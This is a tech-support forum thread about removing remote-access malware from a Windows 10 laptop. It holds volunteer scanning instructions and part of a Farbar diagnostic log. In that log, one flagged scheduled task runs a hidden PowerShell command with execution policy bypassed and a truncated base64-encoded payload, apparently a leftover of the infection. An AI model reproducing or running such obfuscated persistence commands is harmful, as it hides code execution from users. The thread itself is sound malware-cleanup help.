
Downloaded Bookworm. Someone has taken over my computer

#1 ·
Thank you for any help that you can offer.

This is from the Sysinfo Utility:

Tech Support Guy System Info Utility version 1.0.0.2
OS Version: Microsoft Windows 10 Home, 64 bit
Processor: Intel(R) Celeron(R) CPU N2830 @ 2.16GHz, Intel64 Family 6 Model 55 Stepping 8
Processor Count: 2
RAM: 1933 Mb
Graphics Card: Intel(R) HD Graphics, 1030 Mb
Hard Drives: C: Total - 466490 MB, Free - 431894 MB;
Motherboard: TOSHIBA, ZBWAA
Antivirus: Windows Defender, Disabled

I downloaded Bookworm Deluxe. Big mistake. When I turn on my Toshiba laptop, I get a black screen with the names Teamviewer, Supremo, Logmein, and Ammyy on the top.

On the side is Cmd, Task Manager, Explorer. Then there is a blue sign telling me to enter a product key, which I do not do.

The blue circle on the cursor keeps spinning. I get into my computer by pressing Ctrl, Alt, Delete and clicking on Task Manager. Under Startup, I click on Google Chrome and click on file location. Application Tools opens up. I right click open and get "their" replacement window entitled "searching." That window took over my Google Voice.

I clicked on Yahoo in my Google toolbar and my Google phone icon worked. Then I clicked on Google in the toolbar and got my old Google window.

I am afraid to go over to downloads to tell you what steps I have taken already, because when I click on anything if I am in the middle of something, then everything disappears.

I know I had McAfee antivirus, which I disabled to use Windows Defender. I used RKill and RogueKiller. I used Malwarebytes. I used a rootkits type cleaner. I cannot remember if I used Junkware cleaner or not.

That's all that I can remember. So sorry if this is too long. Wanted to give you as much information as possible.

Thank you once again.
 
#2 · (Edited by Moderator)
I think I fixed it, but not sure.

I kept at it, and finally figured it out. I am not good with computers. I am an old lady that just pretty much does email, Facebook, and games.

However, I was up for the challenge. I read, searched, made mistakes, but kept on going.

I read the word "ransomware" and looked it up. Took it from there. Got my screen and my taskbar back with all the icons. Also, their signs and letter disappeared. However, I still had their homepage, with all these numbers after it.

My favorite tool is (I don't know if it's by Revo or Enigma) the one that scans for bits of downloads left behind by uninstallers.

In any case, if one of you would like to check a log or something to see if I am as secure as I think I am, I surely would appreciate it.

Thank you.
 
#4 · (Edited)
1. Download this
http://download.cnet.com/Malwarebytes-Anti-Malware-Free/3000-8022_4-10804572.html

Make sure you do not select the premium demo. You need the free version.

Install it and SCAN.

This can take a while, as it is very thorough.

Open the task manager (right click the taskbar and select task manager)

Click the startup tab.
See if there is anything there, which would make you suspicious. If in doubt, make a clip and post it here for our examination.

P.S. Ref your last post. What is making you suspicious?
P.P.S. You are in the virus section in the forums, of course. There are some guys who specialise in such, so if any problems continue, I am certain someone will step in with expert help.
 
#5 ·
Thank you for getting back to me, Dave. I did as you suggested, and ran Malwarebytes. I used this program a few times during my computer crisis. When I used it before, there were over 100 threats listed. I am sooo happy. There are no threats.

Now that I have calmed down and am trusting my computer again, I cannot even remember what was making me suspicious. My computer is working like it's new!

I have also run my McAfee antivirus a couple times. During the crisis, there was a virus that started with an A. Ar....it had 4 syllables. Can't remember the name of it. Well, my antivirus is reporting everything as ok.

I don't know why no one picked up my case. However, maybe that was for the best, because I have such a great feeling of accomplishment having solved this myself. I never thought I could do it.

Thank you so much for communicating with me, Dave. I really appreciate it.

Jackie
 
#7 ·
Hi. I feel that I still would like to have my system checked "just in case" there are any remnants of the malware, spyware that were in my computer. On the recommendation of Dave, I did run the free Malwarebytes, and there were zero problems.

May I please have a Malware Removal Specialist or Trainee post instructions in this thread that I can carry out?

Thank you.
 
#8 · (Edited)
Warning!
The steps presented in these posts are for this person and machine ONLY. Do not apply these steps to your own system without the guidance of a trained malware removal helper. Doing so may possibly damage your system, preventing it from starting.
Hello jj832 :)

My name is capnkrunch and I will be helping you with your malware problems.

Before we begin, please read and follow these important guidelines, so things will proceed smoothly.
  • The instructions being given are for YOUR computer and system only!
    Using these instructions on a different computer can cause damage to that computer and possibly render it inoperable!
  • You must have Administrator rights, permissions for this computer.
  • DO NOT run any other fix or removal tools unless instructed to do so.
  • DO NOT install any other software (or hardware) during the cleaning process.
  • Only post your problem at (1) one help site. Applying fixes from multiple help sites can cause problems.
  • Print each set of instructions, if possible. Your Internet connection will not be available during some fix processes.
  • Only reply to this thread, do not start another ... Please, continue responding, until I give you the "All Clean".
    Remember, absence of symptoms does mean the infection is all gone.
  • Your security programs may give warnings for some of the tools I will ask you to use. Be assured, any links I give are safe.

Note: If you haven't done so already, please read the topic "Everyone MUST read this BEFORE posting for help in this forum", where the conditions for receiving help here are explained.

Please be aware that removing malware is a potentially hazardous undertaking. I will take care not to knowingly suggest courses of action that might damage your computer. However, it is impossible for me to foresee all interactions that may happen between the software on your computer and those we'll use to clear you of infection, and I cannot guarantee the safety of your system. It is possible that we might encounter situations where the only recourse is to re-format and re-install your operating system, or to necessitate you taking your computer to a repair shop.
For your safety and protection, I would advise backing up all your important documents, personal data files and photos to a CD or DVD drive, as some infections may render your computer unbootable during or before the disinfection process. The safest practice is not to back up any files with the following file extensions:
.exe, .scr, .ini, .htm, .html, .php, .asp, .xml, .zip, .rar, .cab as they may be infected.

 
#9 ·
Please run the following scans:

Step one...

FRST Scan
  • Please download FRST by Farbar, and save it to your Desktop.
    If you are not sure if your system is 32 or 64 bit download and run both. Only the correct one will run.
  • Close all open programs and windows so you are at your Desktop.
  • Right click FRST.exe/FRST64.exe and select Run as administrator.
  • When the tool opens click Yes to the disclaimer.
  • Press the Scan button and wait while the scan finishes.
  • Once finished, two files will open: FRST.txt and Addition.txt. Please copy and paste the contents of both logs in your reply.
    The logs can also be found in the same directory where FRST was run from.

Step two...

AdwCleaner - Scan Only
  • Please download AdwCleaner by Xplode and save it to your Desktop.
  • Close all open programs and windows so that you are at your Desktop.
  • Right click on adwcleaner.exe and click Run as administrator.
  • Click on the Scan button.
    When the scan finishes, you'll see a message in the AdwCleaner window: "Waiting for action. Please uncheck elements you want to keep."
  • Do not attempt to clean anything at this point.
  • Click on the Logfile button.
  • This will open a file, AdwCleaner[S1].txt. Copy and paste the contents of that logfile in your reply.

Step three...

I'd like to see the Malwarebytes logs from before when it was finding many entries.

Post Malwarebytes Anti-Malware (MBAM) Logs
  • Press the Windows Key + R.
  • Type mbam.exe into the text box and click OK.
  • Click History.
  • Click a Scan Log.
  • If there were any detections in that log click Export and then click Copy to Clipboard. Paste the results in your next reply.
  • Repeat for all the scan logs.

Please post each log separately to prevent it being cut off by the forum post size limiter.
Check each after you've posted it to make sure it's all present; if any log is cut off you'll have to post it in sections...

In your next reply please include:
  • Did you have any problems with the instructions?
  • FRST.txt
  • Addition.txt
  • AdwCleaner[S1].txt
  • The MBAM logs
  • Are there any changes in computer behavior?
 
#10 ·
capnkrunch, Thank you very much for taking on my case.

During this scan, towards the beginning of the scan, my McAfee antivirus quarantined a trojan called "Artemis."

Here are the logs from Farbar Recovery Scan.

Additional scan result of Farbar Recovery Scan Tool (x64) Version:29-05-2016 02
Ran by Jackie (2016-05-31 02:56:25)
Running from C:\Users\Jackie\Downloads
Windows 10 Home Version 1511 (X64) (2015-12-23 20:28:26)
Boot Mode: Normal
==========================================================

==================== Accounts: =============================

Administrator (S-1-5-21-3380728539-3698184502-3448567052-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3380728539-3698184502-3448567052-503 - Limited - Disabled)
Guest (S-1-5-21-3380728539-3698184502-3448567052-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3380728539-3698184502-3448567052-1005 - Limited - Enabled)
Jackie (S-1-5-21-3380728539-3698184502-3448567052-1001 - Administrator - Enabled) => C:\Users\Jackie

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {DA9F8ED0-D0DE-39CC-F55A-51AB4CC1B556}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {61FE6F34-F6E4-3642-CFEA-6AD93746FFEB}
FW: McAfee Firewall (Enabled) {E2A40FF5-9AB1-3894-DE05-F89EB212F22D}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adblock Plus for IE (32-bit and 64-bit) (HKLM\...\{0F347A49-E36C-4639-8D2E-003AD408B8B2}) (Version: 1.5 - Eyeo GmbH)
Adobe Flash Player 21 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 21.0.0.242 - Adobe Systems Incorporated)
Adobe Flash Player 21 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 21.0.0.242 - Adobe Systems Incorporated)
Amazon 1Button App (HKLM-x32\...\{893CB813-4179-4BFE-8D33-ABCC38816B48}) (Version: 1.0.6 - Amazon) <==== ATTENTION
Amazon Kindle (HKU\S-1-5-21-3380728539-3698184502-3448567052-1001\...\Amazon Kindle) (Version: 1.14.1.43029 - Amazon)
Apple Application Support (32-bit) (HKLM-x32\...\{FE5C2FAA-118D-4509-B51D-3F71CC9E1B3E}) (Version: 4.3 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{2937FD88-C9D6-4B82-B539-37CD0A572F42}) (Version: 4.3 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{2E4AF2A6-50EA-4260-9BA4-5E582D11879A}) (Version: 9.3.0.15 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{56EC47AA-5813-4FF6-8E75-544026FBEA83}) (Version: 2.2.0.150 - Apple Inc.)
Atheros Driver Installation Program (HKLM-x32\...\{C3A32068-8AB1-4327-BB16-BED9C6219DC7}) (Version: 10.0 - Atheros)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 51.0.2704.63 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.30.3 - Google Inc.) Hidden
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.4276 - Intel Corporation)
Intel(R) Technology Access (HKLM-x32\...\{1709a432-4aab-4ad0-870d-ff74abc41bdd}) (Version: 1.9.0.1021 - Intel Corporation)
Intel(R) Technology Access Software Asset Manager (x32 Version: 3.1.814 - Intel Corporation) Hidden
Intel(R) Trusted Execution Engine (HKLM\...\{176E2755-0A17-42C6-88E2-192AB2131278}) (Version: 1.0.0.1064 - Intel Corporation)
Intel(R) Update Manager (HKLM-x32\...\{B991A1BC-DE0F-41B3-9037-B2F948F706EC}) (Version: 3.1.1228 - Intel Corporation)
Itibiti RTC (x32 Version: 0.0.1 - Itibiti Inc) Hidden
Mahjong Champ (HKLM-x32\...\MahjongChamp) (Version: - )
Mahjong Duels version 1.0 (HKLM-x32\...\Mahjong Duels_is1) (Version: 1.0 - )
Mahjongg Dimensions (HKLM-x32\...\Mahjongg Dimensions_is1) (Version: 1.0 - GameTop Pte. Ltd.)
Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
McAfee Total Protection (HKLM-x32\...\MSC) (Version: 14.0.9029 - McAfee, Inc.)
McAfee Virtual Technician (HKLM-x32\...\McAfee Virtual Technician) (Version: 8.1.0.135 - McAfee, Inc.)
McAfee WebAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.0.189 - McAfee, Inc.)
Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{d07b0db5-8dad-40e1-be90-88026298a46b}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{2749c485-3a8b-4533-92ff-7cf6e8221cff}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
Paltalk Messenger 11.7 (HKLM-x32\...\Paltalk Messenger) (Version: 11.7.630.17743 - AVM Software Inc.)
Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.1.318 - Qualcomm Atheros)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.9600.29075 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.24.1218.2013 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7592 - Realtek Semiconductor Corp.)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.16.3 - Synaptics Incorporated)
TOSHIBA Application Installer (HKLM\...\{21A63CA3-75C0-4E56-B602-B7CD2EF6B621}) (Version: 9.0.2.6 - Toshiba Corporation)
TOSHIBA Audio Enhancement (HKLM\...\{1515F5E3-29EA-4CD1-A981-032D88880F09}) (Version: 2.0.18.0 - Toshiba Corporation)
TOSHIBA Display Utility (HKLM\...\{0B39C39A-3ECE-4582-9C91-842D22819A24}) (Version: 2.0.1.0 - Toshiba Corporation)
TOSHIBA eco Utility (HKLM\...\{72EFCFA8-3923-451D-AF52-7CE9D87BC2A1}) (Version: 3.0.0.6406 - Toshiba Corporation)
TOSHIBA Flash Cards Support Utility (HKLM-x32\...\InstallShield_{620BBA5E-F848-4D56-8BDA-584E44584C5E}) (Version: 1.51.81.2C - TOSHIBA CORPORATION)
TOSHIBA Function Key (HKLM\...\{1844CFE2-EBA3-490A-8A5E-9BFC646342FD}) (Version: 1.1.5.6402 - Toshiba Corporation)
TOSHIBA Password Utility (HKLM-x32\...\InstallShield_{59358FD4-252B-4B38-AB81-955C491A494F}) (Version: 2.0.0.15C - Toshiba Corporation)
TOSHIBA Recovery Media Creator (HKLM-x32\...\{B65BBB06-1F8E-48F5-8A54-B024A9E15FDF}) (Version: 3.2.00.56006005 - Toshiba Corporation)
TOSHIBA Service Station (HKLM\...\{B1F241E1-90BF-4201-8977-A0DF85A38EBB}) (Version: 2.6.16.0 - Toshiba Corporation)
TOSHIBA Start (HKLM-x32\...\{4F0F44AF-90E9-4A6E-9E82-354A3AB79F22}) (Version: 1.0.0.2 - TOSHIBA America Information Systems, Inc)
TOSHIBA System Driver (HKLM-x32\...\{1E6A96A1-2BAB-43EF-8087-30437593C66C}) (Version: 1.00.0033 - Toshiba Corporation)
TOSHIBA System Settings (HKLM-x32\...\{4D57ED72-6B01-40BD-9CA9-012B8FC09CEB}) (Version: 2.0.1.32003 - Toshiba Corporation)
TOSHIBA User's Guide (HKLM-x32\...\{3384E1D9-3F18-4A98-8655-180FEF0DFC02}) (Version: 1.00.02 - TOSHIBA)
TOSHIBARegistration (HKLM-x32\...\{5AF550B4-BB67-4E7E-82F1-2C4300279050}) (Version: 1.1.6 - TOSHIBA)
Utility Common Driver (x32 Version: 1.0.53.3 - Compal) Hidden
WebOptimum (x32 Version: 1.0.0.0 - bscodecs.com) Hidden

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-3380728539-3698184502-3448567052-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Jackie\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\FileCoAuth.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3380728539-3698184502-3448567052-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM.exe (Intel Corporation)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {187C1AA6-48E0-4B16-B0D3-56C3A00E40F6} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {22B4377C-42E5-4112-AC8A-F7B22A924A0B} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2015-09-15] (Synaptics Incorporated)
Task: {3B426901-AF6C-4607-9072-7CBF8A26C7D0} - System32\Tasks\IntelTA-Upgrade-56460984-97c2-4bc7-a632-d776cf817f5d => C:\Program Files (x86)\Intel Corporation\Intel(R) Technology Access\Intel(R) Software Asset Manager\bin\IntelSoftwareAssetManagerService.exe [2015-08-12] (Intel Corporation)
Task: {3BFD9A67-B2AD-4289-960B-AB2875B31222} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-05-26] (Adobe Systems Incorporated)
Task: {3EC508AD-0FB1-45E6-8DE5-527D309F1867} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {53D408ED-AA58-4272-95C2-3612D5B2C203} - System32\Tasks\RTKCPL => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [2015-10-11] (Realtek Semiconductor)
Task: {5725227D-1E24-4C18-BF43-3D0BA67A4153} - System32\Tasks\Intel\Intel Telemetry 2 => C:\Program Files\Intel\Telemetry 2.0\lrio.exe [2015-09-04] (Intel Corporation)
Task: {59BC949D-214B-4EF3-BC05-490F8C1FD653} - System32\Tasks\IntelTA-Upgrade-56460984-97c2-4bc7-a632-d776cf817f5d-Logon => C:\Program Files (x86)\Intel Corporation\Intel(R) Technology Access\Intel(R) Software Asset Manager\bin\IntelSoftwareAssetManagerService.exe [2015-08-12] (Intel Corporation)
Task: {5AD30429-A8BB-48D0-A652-B5F1A0184F56} - System32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473-Logon => C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe [2015-09-25] (Intel Corporation)
Task: {5CD0A353-325B-47F1-BFEA-71C8E039C6D1} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {5E60A084-FCB7-4D86-B311-2BFC5D8925CC} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {5F9D86DF-7B3F-4DFA-A459-555B1E544D3F} - System32\Tasks\CreateExplorerShellUnelevatedTask => /NOUACCHECK
Task: {643C1007-99CA-43E6-AC49-BE4DD5039783} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-03-13] (Google Inc.)
Task: {72EF661D-E58A-4BFD-A927-F307D592C6BF} - System32\Tasks\Intel Security DAT Reputation (AMCore) periodic endpoint safety pulse => C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\54.0\mcdatrep.exe [2016-01-27] (McAfee, Inc.)
Task: {888D0D85-3D0A-4496-951F-6B1397CA4547} - System32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473 => C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe [2015-09-25] (Intel Corporation)
Task: {903CE0CF-33B8-49F5-97F0-51DF41A9A8F3} - System32\Tasks\McAfee\McAfee Idle Detection Task
Task: {92233A66-4718-4BB0-9E9B-A22ED543E163} - System32\Tasks\TOSHIBA\Service Station => C:\Program Files\TOSHIBA\Toshiba Service Station\ToshibaServiceStation.exe [2014-04-03] (TOSHIBA Corporation)
Task: {922EEF01-C913-4DDB-B454-A4D17E7A9C46} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {96A2091E-0F33-4014-AD1C-6A3D0CBED525} - System32\Tasks\Intel Security DAT Reputation (AMCore) Post DAT update endpoint safety pulse => C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\54.0\mcdatrep.exe [2016-01-27] (McAfee, Inc.)
Task: {9EE556F3-F1BB-413D-99E2-14E64688B760} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2016-02-23] (Apple Inc.)
Task: {A896987E-ECA7-4D5E-B831-92CDAE1C95AE} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-03-13] (Google Inc.)
Task: {B0D7805C-1350-4A42-8B65-523AC05DC24F} - \patch1 -> No File <==== ATTENTION
Task: {B2D54339-7576-4F0D-911F-C5A5EEE43ECA} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
Task: {B8D3CC44-B5CE-4680-A725-E90F7A14313A} - System32\Tasks\McAfeeLogon => C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe [2016-04-23] (McAfee, Inc.)
Task: {BC5947D0-3463-4518-9313-3C81EBB84D93} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {C2D1E685-FA86-45AA-8DC0-775BF3C754CE} - System32\Tasks\McAfee\McAfee Auto Maintenance Task Agent
Task: {D62137B2-024B-4967-AAD3-6175DA73F447} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {D9BE2E2B-C60E-47D8-A063-89C6C440B3A1} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {DCC73307-96BA-4EC8-AD96-5428236AD484} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {DE083D62-37C0-4DF4-896B-B8481B01E22D} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_21_0_0_242_pepper.exe [2016-05-25] (Adobe Systems Incorporated)
Task: {DF45108E-9337-44F7-8829-CC6AA2888D4B} - System32\Tasks\{0A0A0A47-0E0D-780B-0A11-0E7E7909110B} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwA7ADsAOwAgADsAOwA7ADsAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBzAHQAbwBwACIAOwAkAHMAYwA9ACIAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAiADsAJABXAGEAcgBuAGkAbgBnAFAAcgBlAGYAZQByAGUAbgBjAGUA (the data entry has 10060 more characters). <==== ATTENTION
Task: {F0700E63-3390-463F-9522-67B9E86E50B2} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {FF48B1A1-8229-41A1-93C5-8A6B7F36E3BA} - System32\Tasks\TechAgent Task => C:\PROGRA~2\TECHAG~1\TECHMO~1.EXE

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player PPAPI Notifier.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_21_0_0_242_pepper.exe
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2015-10-30 03:17 - 2015-10-30 03:17 - 00028672 _____ () C:\WINDOWS\SYSTEM32\efsext.dll
2016-03-18 22:56 - 2016-03-18 22:56 - 00092472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2016-03-18 22:56 - 2016-03-18 22:56 - 01329936 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2015-07-07 11:44 - 2015-07-07 11:44 - 00088064 _____ () C:\Program Files\Intel Corporation\Intel(R) Technology Access\libglog.dll
2016-03-15 14:42 - 2016-03-15 14:42 - 00368800 _____ () C:\Program Files\Intel Corporation\Intel(R) Technology Access\JsonCpp.dll
2015-10-30 03:18 - 2015-10-30 03:18 - 00185856 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-04-12 17:44 - 2016-03-29 06:20 - 02656952 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-04-12 17:44 - 2016-03-29 06:20 - 02656952 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2016-05-18 01:02 - 2016-05-18 01:02 - 00959168 _____ () C:\Users\Jackie\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\amd64\ClientTelemetry.dll
2015-12-24 15:56 - 2015-12-07 00:14 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2016-05-10 16:49 - 2016-04-23 00:25 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2016-05-10 16:50 - 2016-04-23 00:02 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-05-10 16:50 - 2016-04-22 23:58 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-05-10 16:51 - 2016-04-22 23:58 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-05-10 16:51 - 2016-04-23 00:01 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2012-07-18 21:38 - 2012-07-18 21:38 - 00020904 _____ () C:\Program Files\TOSHIBA\Hotkey\SmoothView.dll
2016-05-18 01:01 - 2016-05-18 01:01 - 00679624 _____ () C:\Users\Jackie\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\ClientTelemetry.dll
2016-05-25 23:13 - 2016-05-25 03:38 - 01745560 _____ () C:\Program Files (x86)\Google\Chrome\Application\51.0.2704.63\libglesv2.dll
2016-05-25 23:13 - 2016-05-25 03:38 - 00091288 _____ () C:\Program Files (x86)\Google\Chrome\Application\51.0.2704.63\libegl.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcapexe => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McNaiAnn => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfemms => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k => ""="Service"
